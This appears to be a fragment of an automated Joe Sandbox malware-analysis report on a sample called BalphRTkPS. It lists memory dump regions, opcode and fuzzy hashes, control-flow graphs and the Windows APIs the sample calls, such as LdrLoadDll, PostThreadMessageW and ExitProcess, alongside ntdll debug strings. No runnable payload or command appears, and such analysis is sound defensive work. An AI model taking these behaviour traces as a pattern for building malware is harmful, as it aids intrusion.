                                                                                                              • String ID:
                                                                                                              • API String ID: 410705778-0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: |_6b
                                                                                                              • API String ID: 0-1307392180
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: |_6b
                                                                                                              • API String ID: 0-1307392180
                                                                                                              • Opcode ID: 6177dd0bd00a5388afe19d013d0dd4f7c077883a32f04a262969174902ece09d
                                                                                                              • Instruction ID: 4e2f31d43fad88c15a185294abaad2e72d3667b614aa10a3be4f623926dbdc2c
                                                                                                              • Opcode Fuzzy Hash: 6177dd0bd00a5388afe19d013d0dd4f7c077883a32f04a262969174902ece09d
                                                                                                              • Instruction Fuzzy Hash: 96E10CB4E002598FDB14DFA9D590AAEFBB2FF89304F248269D414A7355D734AD42CFA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9ca7fd2de4e06cf2e2d80f117c06dcb7cf6d57791ec5b9ccdb58150d193b500a
                                                                                                              • Instruction ID: 46a832709bd2c6dbd11b806080d683884fd9e08d6337c6e377996ea84317f75b
                                                                                                              • Opcode Fuzzy Hash: 9ca7fd2de4e06cf2e2d80f117c06dcb7cf6d57791ec5b9ccdb58150d193b500a
                                                                                                              • Instruction Fuzzy Hash: 24E11CB4E002598FDB14DFA9C980AAEFBB2FF89304F248569D414A7355D734AD42CFA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bdda244e669f38ee159031b28469ea29d8a0ec9aab98b09245f20772bb00eb90
                                                                                                              • Instruction ID: a5dcc794d3b23f34fd3eff52de59d2e81de58e890f2c874e6ceab440e0f0123a
                                                                                                              • Opcode Fuzzy Hash: bdda244e669f38ee159031b28469ea29d8a0ec9aab98b09245f20772bb00eb90
                                                                                                              • Instruction Fuzzy Hash: 6FE10CB4E002598FDB14DFA9D590AAEFBB2FF89304F248269D414A7355D7349D42CFA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cb703873d0f2f3b92199fd9df6f25eaf25a3c6a6dec6439731dfb081875bafbf
                                                                                                              • Instruction ID: 01dc039603264bd642ec733e3c37caf687a7bebcef1c79bee196b5ae464d2246
                                                                                                              • Opcode Fuzzy Hash: cb703873d0f2f3b92199fd9df6f25eaf25a3c6a6dec6439731dfb081875bafbf
                                                                                                              • Instruction Fuzzy Hash: 2CE12DB4E002598FDB14DFA9D990AAEFBB2FF89300F248169D414A7355C7359D42CFA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2333481694.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12a0000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 27989b0686b1f700a1dac2e7e13141a54a6bcad0a291e8b51de34b37d67e4c00
                                                                                                              • Instruction ID: 14bd56a86485e675c321c0758790b2ba886195a5c09656c85a9a2ae229055bf1
                                                                                                              • Opcode Fuzzy Hash: 27989b0686b1f700a1dac2e7e13141a54a6bcad0a291e8b51de34b37d67e4c00
                                                                                                              • Instruction Fuzzy Hash: 15A18F36E1020A8FCF19DFB4C9405AEBBB2FF85300B55856AE901AF265DB75E946CF40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f92f545f99bf1bc624989be1d2b673aa32cc588e02a4b8f42688591e69a6572e
                                                                                                              • Instruction ID: d4405fc938cddc499d18a9cb031c11a691176c6b448269513dd9e769f32688d2
                                                                                                              • Opcode Fuzzy Hash: f92f545f99bf1bc624989be1d2b673aa32cc588e02a4b8f42688591e69a6572e
                                                                                                              • Instruction Fuzzy Hash: 4751FCB4E002598BDB14CFA9D9805AEFBB2FF89304F24816AD418AB355D7359D42CFA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2337996899.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74e0000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f4de70d8fb992edfcd264a2cc0264c72963ba69aa21f3b79b7b1b7b779655208
                                                                                                              • Instruction ID: e15a281da5da84e6aeff65752203718887a38b41578af9647729e73d0ec5ee79
                                                                                                              • Opcode Fuzzy Hash: f4de70d8fb992edfcd264a2cc0264c72963ba69aa21f3b79b7b1b7b779655208
                                                                                                              • Instruction Fuzzy Hash: C62127F26056559FCB069B28E8518E9BF75EFC2232705429BC140DF662DB31DC49C7D2

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:1.3%
                                                                                                              Dynamic/Decrypted Code Coverage:5.3%
                                                                                                              Signature Coverage:8.3%
                                                                                                              Total number of Nodes:132
                                                                                                              Total number of Limit Nodes:9

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 253 417d83-417dac call 42f8d3 256 417db2-417dc0 call 42fed3 253->256 257 417dae-417db1 253->257 260 417dd0-417de1 call 42e383 256->260 261 417dc2-417dcd call 430173 256->261 266 417de3-417df7 LdrLoadDll 260->266 267 417dfa-417dfd 260->267 261->260 266->267
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417DF5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_400000_BalphRTkPS.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 278 42ccb3-42ccec call 404623 call 42dea3 NtClose
                                                                                                              APIs
                                                                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CCE7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_400000_BalphRTkPS.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 3535843008-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 0 4145a8-4145ae 1 4145b0-4145c4 0->1 2 414628-414641 0->2 3 414663-414668 2->3 4 414643-414654 PostThreadMessageW 2->4 4->3 5 414656-414660 4->5 5->3
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(086604I_P,00000111,00000000,00000000), ref: 00414650
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_400000_BalphRTkPS.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 04I_$086604I_P$086604I_P
                                                                                                              • API String ID: 1836367815-762223272
                                                                                                              • Opcode ID: 3cfd6ed29607252215f596f045744a4ea9eb262d71c1a3a603205bf06dbbed58
                                                                                                              • Instruction ID: 7364b2b1fcad01788479a4f9307d5c54d4abcef8cf499afca70ead5bc7e82b5e
                                                                                                              • Opcode Fuzzy Hash: 3cfd6ed29607252215f596f045744a4ea9eb262d71c1a3a603205bf06dbbed58
                                                                                                              • Instruction Fuzzy Hash: 59F02B32B0534C75D71186549C41FFEBB68DF82B18F0402DAE904AA140D679190687D5

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(086604I_P,00000111,00000000,00000000), ref: 00414650
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_400000_BalphRTkPS.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 086604I_P$086604I_P
                                                                                                              • API String ID: 1836367815-368392577
                                                                                                              • Opcode ID: 9faca414eb337fa319e387a092d35be794f1d16e79f047f58bbeb488bc85edba
                                                                                                              • Instruction ID: 3b1c6bc8a4282993d6e4a2e48ae66367294b2a1ba01f1a571c31a1870c0ceae8
                                                                                                              • Opcode Fuzzy Hash: 9faca414eb337fa319e387a092d35be794f1d16e79f047f58bbeb488bc85edba
                                                                                                              • Instruction Fuzzy Hash: 25112972D8021C76E711A6919C42FDF7B7C8F81B58F404169FA047B2C0D6B85A0687E9

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(086604I_P,00000111,00000000,00000000), ref: 00414650
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_400000_BalphRTkPS.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 086604I_P$086604I_P
                                                                                                              • API String ID: 1836367815-368392577
                                                                                                              • Opcode ID: 2eede3f84bbbc3eef2b243bf2801b5c3105a0f127df9a857c8291aedbf75753a
                                                                                                              • Instruction ID: 0fb9ab954ef8db3f32d4c25afcf056a5d19c50fc272c64c350af8f6a8d246f1f
                                                                                                              • Opcode Fuzzy Hash: 2eede3f84bbbc3eef2b243bf2801b5c3105a0f127df9a857c8291aedbf75753a
                                                                                                              • Instruction Fuzzy Hash: CA01D671E4025876EB21A6919C42FDF7B7C9F81B58F014169FA047B2C0D6BC5A0687E9

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 231 417e46-417e49 232 417dd8-417de1 231->232 233 417e4b-417e52 231->233 234 417de3-417df7 LdrLoadDll 232->234 235 417dfa-417dfd 232->235 236 417e54-417e68 233->236 237 417e3a-417e3c 233->237 234->235 240 417e69-417e7a 236->240 238 417e3f-417e41 237->238 239 417e3e 237->239 241 417e01-417e02 238->241 242 417e43-417e44 238->242 239->238 244 417e7b-417e9b 240->244 244->244 245 417e9d-417e9f 244->245 246 417ea1 245->246 247 417eff-417f3e call 42f933 call 42bcb3 245->247 246->240 248 417ea3-417ea5 246->248 248->247
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417DF5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_400000_BalphRTkPS.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: 053a41170c05f9030fbabc1ce501264e8b41e8ee11647377fdeb60175f8d8c96
                                                                                                              • Instruction ID: 6fda3640aeabacdf2414ac2a0c0e5c28ef028ee1734c6d5c1d6e7c4e4c655ad8
                                                                                                              • Opcode Fuzzy Hash: 053a41170c05f9030fbabc1ce501264e8b41e8ee11647377fdeb60175f8d8c96
                                                                                                              • Instruction Fuzzy Hash: 0021BE7554D3895ACB11DBA4CC80BDEBB74DF46328F0443DEE444CF282D664D94583D5

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 273 42d003-42d044 call 404623 call 42dea3 RtlFreeHeap
                                                                                                              APIs
                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,D08CFFD5,00000007,00000000,00000004,00000000,004175E7,000000F4), ref: 0042D03F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_400000_BalphRTkPS.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3298025750-0
                                                                                                              • Opcode ID: 03c4c79e38dc09a6bc7d5db5b5ebb6e976b89401a2158c2de3acff6390cbe796
                                                                                                              • Instruction ID: 480c2476483c24a98dc1ccd4d3f8387b92b9bc50a10ea559d801330f157754dd
                                                                                                              • Opcode Fuzzy Hash: 03c4c79e38dc09a6bc7d5db5b5ebb6e976b89401a2158c2de3acff6390cbe796
                                                                                                              • Instruction Fuzzy Hash: CCE065B66046147FE710EFA9EC41E9B33ACEFC9710F00041AFA08A7241D778B9108AB9

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 268 42cfb3-42cff4 call 404623 call 42dea3 RtlAllocateHeap
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(?,0041EB4E,?,?,00000000,?,0041EB4E,?,?,?), ref: 0042CFEF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_400000_BalphRTkPS.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: fc49648c11e90faf33731bc79bc8e8675936d387bbefc8f6442bf02281781b34
                                                                                                              • Instruction ID: dc73a00d5b2d417b2c46dafea40d9adc71060332ee157e8bfc2b2fc429177c5c
                                                                                                              • Opcode Fuzzy Hash: fc49648c11e90faf33731bc79bc8e8675936d387bbefc8f6442bf02281781b34
                                                                                                              • Instruction Fuzzy Hash: 2DE06DB66042047BD610EE59EC41E9B33ACDFC9710F000819F908A7241D675BA118BB9

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 283 42d053-42d08c call 404623 call 42dea3 ExitProcess
                                                                                                              APIs
                                                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,B9F6A3FE,?,?,B9F6A3FE), ref: 0042D087
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_400000_BalphRTkPS.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExitProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 621844428-0
                                                                                                              • Opcode ID: 15264c56b12c26b86eb90c2dabc34e6d55a96133bf5bcb6f2ee9bafa70ba7c0d
                                                                                                              • Instruction ID: 7a9833e9e4d947a3999cb396ff3879e5195884ea37e196f788b44d0b0899353c
                                                                                                              • Opcode Fuzzy Hash: 15264c56b12c26b86eb90c2dabc34e6d55a96133bf5bcb6f2ee9bafa70ba7c0d
                                                                                                              • Instruction Fuzzy Hash: D2E04F722406147BC210FA5ADC02F9B775CDBC5715F10845AFA086B241D7B9791587A8

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 288 1772c0a-1772c0f 289 1772c11-1772c18 288->289 290 1772c1f-1772c26 LdrInitializeThunk 288->290
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 6575b6a84f96634bcab2904b3970ac6f48dc01f298106a71029f58955a9f8f03
                                                                                                              • Instruction ID: 7fe65e61980c790fdd4b1a34f6346f066874f608441069daf3ea2630a6eb2d2c
                                                                                                              • Opcode Fuzzy Hash: 6575b6a84f96634bcab2904b3970ac6f48dc01f298106a71029f58955a9f8f03
                                                                                                              • Instruction Fuzzy Hash: D3B04C719455C585DB11A7644608616B9056790711F55C461D2120655B47288191E276
                                                                                                              Strings
                                                                                                              • *** enter .cxr %p for the context, xrefs: 017E8FBD
                                                                                                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 017E8F2D
                                                                                                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 017E8DC4
                                                                                                              • read from, xrefs: 017E8F5D, 017E8F62
                                                                                                              • *** then kb to get the faulting stack, xrefs: 017E8FCC
                                                                                                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 017E8DB5
                                                                                                              • The instruction at %p referenced memory at %p., xrefs: 017E8EE2
                                                                                                              • an invalid address, %p, xrefs: 017E8F7F
                                                                                                              • The critical section is owned by thread %p., xrefs: 017E8E69
                                                                                                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 017E8D8C
                                                                                                              • Go determine why that thread has not released the critical section., xrefs: 017E8E75
                                                                                                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017E8E86
                                                                                                              • This failed because of error %Ix., xrefs: 017E8EF6
                                                                                                              • *** Resource timeout (%p) in %ws:%s, xrefs: 017E8E02
                                                                                                              • The resource is owned shared by %d threads, xrefs: 017E8E2E
                                                                                                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 017E8FEF
                                                                                                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 017E8E4B
                                                                                                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 017E8DD3
                                                                                                              • The instruction at %p tried to %s , xrefs: 017E8F66
                                                                                                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 017E8F26
                                                                                                              • <unknown>, xrefs: 017E8D2E, 017E8D81, 017E8E00, 017E8E49, 017E8EC7, 017E8F3E
                                                                                                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 017E8DA3
                                                                                                              • a NULL pointer, xrefs: 017E8F90
                                                                                                              • The resource is owned exclusively by thread %p, xrefs: 017E8E24
                                                                                                              • *** An Access Violation occurred in %ws:%s, xrefs: 017E8F3F
                                                                                                              • *** Inpage error in %ws:%s, xrefs: 017E8EC8
                                                                                                              • write to, xrefs: 017E8F56
                                                                                                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 017E8F34
                                                                                                              • *** enter .exr %p for the exception record, xrefs: 017E8FA1
                                                                                                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017E8E3F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                              Strings
                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 017A5543
                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A540A, 017A5496, 017A5519
                                                                                                              • Critical section address, xrefs: 017A5425, 017A54BC, 017A5534
                                                                                                              • Thread identifier, xrefs: 017A553A
                                                                                                              • Address of the debug info found in the active list., xrefs: 017A54AE, 017A54FA
                                                                                                              • double initialized or corrupted critical section, xrefs: 017A5508
                                                                                                              • Critical section address., xrefs: 017A5502
                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A54CE
                                                                                                              • Invalid debug info address of this critical section, xrefs: 017A54B6
                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A54E2
                                                                                                              • Critical section debug info address, xrefs: 017A541F, 017A552E
                                                                                                              • corrupted critical section, xrefs: 017A54C2
                                                                                                              • 8, xrefs: 017A52E3
                                                                                                              • undeleted critical section in freed memory, xrefs: 017A542B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                              Strings
                                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 017A2624
                                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 017A261F
                                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017A22E4
                                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 017A2409
                                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 017A2498
                                                                                                              • @, xrefs: 017A259B
                                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017A24C0
                                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 017A2412
                                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 017A2602
                                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 017A2506
                                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017A25EB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
